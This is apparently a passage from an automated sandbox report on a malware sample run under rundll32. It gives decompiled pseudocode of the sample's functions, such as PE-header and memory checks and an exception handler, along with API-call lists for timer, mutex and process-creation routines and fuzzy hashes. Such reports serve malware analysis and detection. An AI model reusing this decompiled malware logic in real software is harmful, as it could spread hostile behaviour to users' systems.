												 *0x36da3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x36da380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x36da388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x36da384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x36da388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x36da388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x36da3c8 = 1;
							__eflags =  *0x36da3c8;
							if( *0x36da3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x36da388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x36da388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x36da3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x36da388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x36da380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x36da388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x36da388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                          0x036d84cb
                                                          0x036d84ce
                                                          0x036d84d4
                                                          0x036d84f2
                                                          0x00000000
                                                          0x036d84f2
                                                          0x036d84dc
                                                          0x036d84e5
                                                          0x036d84eb
                                                          0x036d84fa
                                                          0x036d84fd
                                                          0x036d8500
                                                          0x036d850a
                                                          0x036d850a
                                                          0x036d850c
                                                          0x036d850f
                                                          0x036d8511
                                                          0x036d8511
                                                          0x036d8513
                                                          0x036d8516
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8518
                                                          0x036d851a
                                                          0x036d8580
                                                          0x036d8580
                                                          0x036d86de
                                                          0x00000000
                                                          0x036d86de
                                                          0x036d851c
                                                          0x036d851c
                                                          0x036d8520
                                                          0x036d8522
                                                          0x036d8522
                                                          0x036d8522
                                                          0x036d8522
                                                          0x036d8525
                                                          0x036d8526
                                                          0x036d8529
                                                          0x036d8529
                                                          0x036d852d
                                                          0x036d8531
                                                          0x036d853f
                                                          0x036d853f
                                                          0x036d8547
                                                          0x036d854d
                                                          0x036d854f
                                                          0x036d8551
                                                          0x036d8561
                                                          0x036d856e
                                                          0x036d8572
                                                          0x036d8577
                                                          0x036d8579
                                                          0x036d85f7
                                                          0x036d85f7
                                                          0x036d857b
                                                          0x036d857b
                                                          0x036d857b
                                                          0x036d85f9
                                                          0x036d85fb
                                                          0x036d86dc
                                                          0x036d86dc
                                                          0x00000000
                                                          0x036d8601
                                                          0x036d8601
                                                          0x036d8608
                                                          0x00000000
                                                          0x00000000
                                                          0x036d860e
                                                          0x036d8612
                                                          0x036d866e
                                                          0x036d8670
                                                          0x036d8678
                                                          0x036d867a
                                                          0x036d867c
                                                          0x00000000
                                                          0x00000000
                                                          0x036d867e
                                                          0x036d8684
                                                          0x036d8686
                                                          0x036d8688
                                                          0x036d869d
                                                          0x036d869d
                                                          0x036d869f
                                                          0x036d86ce
                                                          0x036d86d5
                                                          0x00000000
                                                          0x036d86d5
                                                          0x036d86a3
                                                          0x036d86a4
                                                          0x036d86a6
                                                          0x036d86a8
                                                          0x036d86a8
                                                          0x036d86aa
                                                          0x036d86ac
                                                          0x036d86ae
                                                          0x036d86c2
                                                          0x036d86c2
                                                          0x036d86c5
                                                          0x036d86c7
                                                          0x036d86c7
                                                          0x036d86c8
                                                          0x036d86c8
                                                          0x00000000
                                                          0x036d86b0
                                                          0x036d86b0
                                                          0x036d86b0
                                                          0x036d86b9
                                                          0x036d86ba
                                                          0x036d86bc
                                                          0x036d86be
                                                          0x036d86be
                                                          0x00000000
                                                          0x036d86b0
                                                          0x036d86ae
                                                          0x036d868a
                                                          0x036d8691
                                                          0x036d8691
                                                          0x036d8693
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8695
                                                          0x036d8696
                                                          0x036d8699
                                                          0x036d869b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d869b
                                                          0x00000000
                                                          0x036d8691
                                                          0x036d8614
                                                          0x036d8617
                                                          0x036d861c
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8625
                                                          0x036d8627
                                                          0x036d862d
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8633
                                                          0x036d8639
                                                          0x00000000
                                                          0x00000000
                                                          0x036d863f
                                                          0x036d8641
                                                          0x036d864a
                                                          0x036d864e
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8654
                                                          0x036d8657
                                                          0x036d8659
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8660
                                                          0x036d8662
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8664
                                                          0x036d8668
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8668
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8553
                                                          0x036d8553
                                                          0x036d8553
                                                          0x036d855a
                                                          0x00000000
                                                          0x00000000
                                                          0x036d855c
                                                          0x036d855d
                                                          0x036d855f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d855f
                                                          0x036d8587
                                                          0x036d8589
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8599
                                                          0x036d859b
                                                          0x036d859d
                                                          0x00000000
                                                          0x00000000
                                                          0x036d85a3
                                                          0x036d85aa
                                                          0x036d85d6
                                                          0x036d85d6
                                                          0x036d85d8
                                                          0x036d85da
                                                          0x036d85ee
                                                          0x036d85f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d85dc
                                                          0x036d85dc
                                                          0x036d85dc
                                                          0x036d85e5
                                                          0x036d85e6
                                                          0x036d85e8
                                                          0x036d85ea
                                                          0x036d85ea
                                                          0x00000000
                                                          0x036d85dc
                                                          0x036d85ac
                                                          0x036d85ac
                                                          0x036d85af
                                                          0x036d85b1
                                                          0x036d85c3
                                                          0x036d85c3
                                                          0x036d85c6
                                                          0x036d85c8
                                                          0x036d85c8
                                                          0x036d85c9
                                                          0x036d85c9
                                                          0x036d85cf
                                                          0x036d85cf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d85b3
                                                          0x036d85b3
                                                          0x036d85b3
                                                          0x036d85ba
                                                          0x00000000
                                                          0x00000000
                                                          0x036d85bc
                                                          0x036d85bc
                                                          0x036d85bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d85bd
                                                          0x036d85bf
                                                          0x036d85c1
                                                          0x036d85d4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d85d4
                                                          0x00000000
                                                          0x036d85c1
                                                          0x036d8533
                                                          0x036d8536
                                                          0x036d8539
                                                          0x00000000
                                                          0x00000000
                                                          0x036d853b
                                                          0x036d853d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d853d
                                                          0x036d8502
                                                          0x036d8504
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 036D8572
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: 9e62256cc04b629e6d6a9bae1b70a568b78d4c50d5d328631b241fc4d573143e
                                                          • Instruction ID: 7df569839b6c323d5e7669e87e98dca3839e4ffd3f844fa89610908a7a7dd765
                                                          • Opcode Fuzzy Hash: 9e62256cc04b629e6d6a9bae1b70a568b78d4c50d5d328631b241fc4d573143e
                                                          • Instruction Fuzzy Hash: F561F770F0064A9FDB69CE2CC59867A73A6FB85364F2C856DD806CB784E731D852C744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06288E57 Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 06288EC7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: a8a0d7d239bb1cfbb5ae453dc360bf04ed21e725d516dfa9e98e7a7ba24af93a
                                                          • Instruction ID: fbda430c4e452e2ae513606f3cfe242b040c86d8addf31c863c703059ad3daea
                                                          • Opcode Fuzzy Hash: a8a0d7d239bb1cfbb5ae453dc360bf04ed21e725d516dfa9e98e7a7ba24af93a
                                                          • Instruction Fuzzy Hash: 3611C03252124AAFDF425E98ED00DDA7BA6FF48364B494115FE1952160C736C871EF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062736BB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 062736D3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorStatus
                                                          • String ID:
                                                          • API String ID: 1596131371-0
                                                          • Opcode ID: b38b0e4fe69e4840bb5e8c151431bfd7222005836bfcfb81a5627f0bd1932ec7
                                                          • Instruction ID: ed67731b78c1adaadd746e696c1816d6533aeae53778463f67a51ad808681770
                                                          • Opcode Fuzzy Hash: b38b0e4fe69e4840bb5e8c151431bfd7222005836bfcfb81a5627f0bd1932ec7
                                                          • Instruction Fuzzy Hash: E6C01236E053036BDE199A51E81CD2E7B52AB94351F00441CB64A90460C6319450DB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D829C Relevance: .1, Instructions: 77COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E036D829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E036D8407(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E036D84C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E036D83AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E036D8407(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E036D84A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                          0x036d82a0
                                                          0x036d82a1
                                                          0x036d82a2
                                                          0x036d82a5
                                                          0x036d82a7
                                                          0x036d82aa
                                                          0x036d82ab
                                                          0x036d82ad
                                                          0x036d82ae
                                                          0x036d82af
                                                          0x036d82b2
                                                          0x036d82bc
                                                          0x036d836d
                                                          0x036d8374
                                                          0x036d837d
                                                          0x036d82c2
                                                          0x036d82c2
                                                          0x036d82c8
                                                          0x036d82ce
                                                          0x036d82d1
                                                          0x036d82d4
                                                          0x036d82d8
                                                          0x036d82dd
                                                          0x036d82e2
                                                          0x036d8362
                                                          0x00000000
                                                          0x036d82e4
                                                          0x036d82e4
                                                          0x036d82f0
                                                          0x036d82f2
                                                          0x036d834d
                                                          0x036d834d
                                                          0x036d8353
                                                          0x00000000
                                                          0x036d82f4
                                                          0x036d8303
                                                          0x036d8305
                                                          0x036d8306
                                                          0x036d8307
                                                          0x036d830a
                                                          0x036d830a
                                                          0x036d830c
                                                          0x00000000
                                                          0x036d830e
                                                          0x036d830e
                                                          0x036d8358
                                                          0x036d8310
                                                          0x036d8310
                                                          0x036d8314
                                                          0x036d831c
                                                          0x036d8321
                                                          0x036d8326
                                                          0x036d8332
                                                          0x036d833a
                                                          0x036d8341
                                                          0x036d8347
                                                          0x036d834b
                                                          0x00000000
                                                          0x036d834b
                                                          0x036d830e
                                                          0x036d830c
                                                          0x00000000
                                                          0x036d82f2
                                                          0x036d8366
                                                          0x036d8366
                                                          0x036d8366
                                                          0x036d82e2
                                                          0x036d8382
                                                          0x036d8389

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction ID: d86d1e149c89557073586aabc4511a6d370b196a159bd96f23358bd8920dd5a1
                                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction Fuzzy Hash: CE21B672D002049FCB10DFA8C8849ABFBA9FF48350B4A85A8D95D9B245E730F915C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06293DB0 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                          • Instruction ID: 7202e926a8723cc08ece4e6f02340c3aaa922725876c55feeb385bea7de8714f
                                                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                          • Instruction Fuzzy Hash: DA219272910205ABCF50EF68C8809ABB7A5FF84310B0581A9DD568B245D730FA15C7F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062737C2 Relevance: 54.4, APIs: 36, Instructions: 424synchronizationtimethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06285C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 06285C5C
                                                            • Part of subcall function 06285C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 06285D1D
                                                            • Part of subcall function 06285C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 06285D26
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 06273860
                                                            • Part of subcall function 0627A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0627A990
                                                            • Part of subcall function 0627A976: CreateWaitableTimerA.KERNEL32(0629A1E8,00000001,?), ref: 0627A9AD
                                                            • Part of subcall function 0627A976: GetLastError.KERNEL32(?,00000000,06288C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0627A9BE
                                                            • Part of subcall function 0627A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627A9FE
                                                            • Part of subcall function 0627A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA1D
                                                            • Part of subcall function 0627A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA33
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 062738C3
                                                          • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 0627393F
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 06273961
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 062739A1
                                                            • Part of subcall function 0627F08E: RtlAllocateHeap.NTDLL(00000000,00000010,76CDF730), ref: 0627F0B0
                                                            • Part of subcall function 0627F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,06273899,?), ref: 0627F0DE
                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 06273A47
                                                          • CloseHandle.KERNEL32(?), ref: 06273CD6
                                                            • Part of subcall function 0627E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,06273A69,?), ref: 0627E2F2
                                                            • Part of subcall function 0627E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,06273A69,?), ref: 0627E320
                                                            • Part of subcall function 0627E2E6: ResetEvent.KERNEL32(?,?,?,?,?,06273A69,?), ref: 0627E33A
                                                          • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 06273A7C
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273A8B
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06273AB8
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 06273AD2
                                                          • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 06273B1A
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 06273B34
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 06273B4A
                                                          • ReleaseMutex.KERNEL32(?), ref: 06273B67
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273B78
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273B87
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06273BBB
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 06273BD5
                                                          • SwitchToThread.KERNEL32 ref: 06273BD7
                                                          • ReleaseMutex.KERNEL32(?), ref: 06273BE1
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273C1F
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273C2A
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 06273C4D
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 06273C67
                                                          • SwitchToThread.KERNEL32 ref: 06273C69
                                                          • ReleaseMutex.KERNEL32(?), ref: 06273C73
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06273C88
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273CEA
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273CF6
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D02
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D0E
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D1A
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D26
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 06273D32
                                                          • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 06273D41
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                                          • String ID:
                                                          • API String ID: 2369282788-0
                                                          • Opcode ID: 4f525501c668425ab66889d4a71c8a5d5305f3d29523f9b0e678ed79514ebcb2
                                                          • Instruction ID: 7444b16c77bfdf1d330a53c4e64b59fa84b8b0235820857b884e2e45a2150a85
                                                          • Opcode Fuzzy Hash: 4f525501c668425ab66889d4a71c8a5d5305f3d29523f9b0e678ed79514ebcb2
                                                          • Instruction Fuzzy Hash: 82E1B271824312AFDB91EF64DC84D6AB7E9FB84354F044A2DFA95921A0D731CC44DF22
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628F1C4 Relevance: 43.8, APIs: 29, Instructions: 271memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0628F1E5
                                                          • GetTickCount.KERNEL32 ref: 0628F1FF
                                                          • wsprintfA.USER32 ref: 0628F252
                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0628F25E
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0628F269
                                                          • _aulldiv.NTDLL(?,?,?,?), ref: 0628F27F
                                                          • wsprintfA.USER32 ref: 0628F295
                                                          • wsprintfA.USER32 ref: 0628F2AF
                                                          • wsprintfA.USER32 ref: 0628F2D4
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628F2E7
                                                          • wsprintfA.USER32 ref: 0628F30B
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628F31E
                                                          • wsprintfA.USER32 ref: 0628F358
                                                          • wsprintfA.USER32 ref: 0628F37C
                                                          • lstrcat.KERNEL32(?,?), ref: 0628F3B4
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0628F3CE
                                                          • GetTickCount.KERNEL32 ref: 0628F3DE
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0628F3F2
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 0628F410
                                                          • StrTrimA.SHLWAPI(00000000,062953E8,00000000,0689C310), ref: 0628F449
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0628F46B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0628F472
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0628F479
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0628F480
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0628F4FA
                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 0628F50C
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,0689C310), ref: 0628F51B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628F52D
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628F53F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                                                          • String ID:
                                                          • API String ID: 4198993012-0
                                                          • Opcode ID: ec64257c32074ba13de7e4917ff5f338ea7d24901cd2e9dced4ad7477fdab184
                                                          • Instruction ID: 4d04c3046320b281fe05299989fb87b35032fb3084a1aa014fe6e183a960caa5
                                                          • Opcode Fuzzy Hash: ec64257c32074ba13de7e4917ff5f338ea7d24901cd2e9dced4ad7477fdab184
                                                          • Instruction Fuzzy Hash: A2A15D71600306AFCB41EF68FD88E5A3BEAEF88354F040419FA19D6251E735D859DFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

